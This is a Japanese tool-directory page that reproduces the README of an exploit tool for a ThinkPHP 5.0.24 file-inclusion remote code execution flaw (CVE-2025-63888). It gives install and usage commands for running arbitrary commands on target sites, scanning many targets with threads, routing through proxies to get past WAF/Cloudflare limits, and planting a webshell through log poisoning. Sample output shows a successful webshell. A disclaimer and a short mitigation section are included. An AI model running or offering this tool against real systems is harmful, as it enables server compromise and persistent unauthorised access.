Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-63888-exploit — CVE-2025-63888(ThinkPHP 5.0.24 ファイルインクルード RCE 脆弱性)を検出・テストするためのセキュリティ研究ツール | Kitploit
ツール/GitHubGitHub/an5i/cve-2025-63888-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

CVE-2025-63888(ThinkPHP 5.0.24 ファイルインクルード RCE 脆弱性)を検出・テストするためのセキュリティ研究ツール

リポジトリを見る
10429ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-63888 ThinkPHP 5.0.24 ファイルインクルージョン RCE エクスプロイト

ThinkPHP 5.0.24 における CVE-2025-63888 脆弱性を検出・テストするためのセキュリティ研究ツールです。ファイルインクルージョン攻撃を介したリモートコード実行を可能にします。

⚠️ 免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみで使用してください。許可なくコンピュータシステムにアクセスすることは違法です。このツールは、自分の所有するシステム、または明示的な書面による許可を得たシステムでのみ使用してください。

📋 概要

CVE-2025-63888 は、ThinkPHP 5.0.24 における重大なリモートコード実行脆弱性です。この脆弱性は thinkphp/library/think/template/driver/File.php にある read 関数に存在し、攻撃者が view() 関数のテンプレートパスを操作することで、ファイルインクルージョン攻撃を介して任意のコードを実行できます。

CVSS スコア: 9.8(Critical)
影響を受けるバージョン: ThinkPHP 5.0.24(該当バージョン)
脆弱性ファイル: thinkphp/library/think/template/driver/File.php
脆弱性関数: read() メソッド

🔍 機能

  • 自動 ThinkPHP 検出: ThinkPHP のインストールとバージョンを識別
  • 脆弱性テスト: CVE-2025-63888 ファイルインクルージョン脆弱性をテスト
  • エンドポイント発見: 脆弱なエンドポイントを自動的に発見
  • ファイルインクルージョンエクスプロイト: ファイルインクルージョン機能の実証
  • ログファイルポイズニング: RCE のためのログファイルへの毒入れを試行
  • Webshell 作成: ファイルインクルージョンを介した Webshell の作成
  • コマンド実行: 任意のコマンドを実行(許可されたテスト用)
  • マルチスレッド対応: 複数ターゲットを並行スキャン
  • プロキシ対応: WAF/Cloudflare 制限の回避
  • JSON エクスポート: JSON 形式での詳細結果出力

📦 インストール

前提条件

  • Python 3.6 以上
  • pip(Python パッケージマネージャー)

クイックインストール

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x cve_2025_63888_exploit.py

代替方法:直接ダウンロード

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# Install dependencies
pip install requests

🚀 使用方法

基本的な使い方

root@kitploit:~
# Single target
python3 cve_2025_63888_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_63888_exploit.py -u http://target.com -v

プロキシの使用

root@kitploit:~
# Single proxy
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

コマンドラインオプション

root@kitploit:~
-u, --url          ターゲット URL
-f, --file         ターゲット URL を含むファイル(1行に1つ)
-c, --command      実行するコマンド(デフォルト: id)
-t, --threads      スレッド数(デフォルト: 1)
-o, --output       出力ファイル(デフォルト: uknf_results.json)
-v, --verbose      詳細ログの有効化
--proxy            プロキシ URL(例: http://127.0.0.1:8080)
--proxy-list       プロキシ URL を含むファイル(1行に1つ)

📊 出力

スクリプトは詳細結果を JSON ファイルで生成します。

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 動作の仕組み

  1. 検出フェーズ: ThinkPHP フレームワークの指標をスキャン
  2. バージョン検出: ThinkPHP のバージョン(5.0.24)を特定
  3. 脆弱性テスト: ファイルインクルージョン脆弱性をテスト
  4. エンドポイント発見: view() 関数を使用した脆弱なエンドポイントを発見
  5. エクスプロイト: ファイルインクルージョンによる RCE 機能の実証

🛡️ 緩和策

ThinkPHP 5.0.24 を使用している場合:

  1. すぐにアップグレードする:

    • ThinkPHP 5.0.25 以上に更新
    • または ThinkPHP 6.x/7.x にアップグレード
  2. パス検証を実装する:

    • view() 関数で厳格なパス検証を追加
    • ディレクトリトラバーサル文字(../、..)をブロック
    • テンプレートパスを許可リストに制限
  3. コードレベルの修正:

    • 処理前にテンプレートパスを検証
    • realpath() を使用してファイルが許可ディレクトリ内にあることを確認
    • 関数のホワイトリストを実装

📚 参考情報

  • CVE: CVE-2025-63888
  • GitHub Gist: CVE-2025-63888 Details
  • Yuque Article: Detailed Analysis
  • ThinkPHP Manual: Official Documentation

📖 使用例

例 1: 単一ターゲットのスキャン

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com

例 2: 複数ターゲットと出力

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

例 3: カスタムコマンドの実行

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

例 4: プロキシの使用

root@kitploit:~
# Single proxy
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 貢献

貢献は歓迎します!Pull Request を自由に送信してください。

  1. リポジトリをフォーク
  2. フィーチャーブランチを作成(git checkout -b feature/AmazingFeature)
  3. 変更をコミット(git commit -m 'Add some AmazingFeature')
  4. ブランチにプッシュ(git push origin feature/AmazingFeature)
  5. Pull Request を開く

🐛 問題

問題が発生した場合や提案がある場合は、GitHub で Issue を開いてください。

📝 ライセンス

このプロジェクトは MIT ライセンスの下で提供されています。詳細は LICENSE ファイルを参照してください。

⭐ スター履歴

このツールが役に立った場合は、GitHub でスターをよろしくお願いします!

⚖️ 法的注意

このツールは教育および許可されたセキュリティテスト目的でのみ提供されています。著者は、このプログラムの誤用または損害について一切の責任を負いません。ユーザーは、システムをテストする前に適切な許可を得ていることを確認する責任があります。

🙏 謝辞

  • 脆弱性の最初の報告者: Master-0-0
  • ThinkPHP セキュリティコミュニティ
  • 脆弱性分析に貢献したセキュリティ研究者の皆様

💰 寄付

このツールが役に立ち、プロジェクトを支援したい場合:

Bitcoin(BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum(ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

ご支援ありがとうございます! 🙏

ツールをダウンロード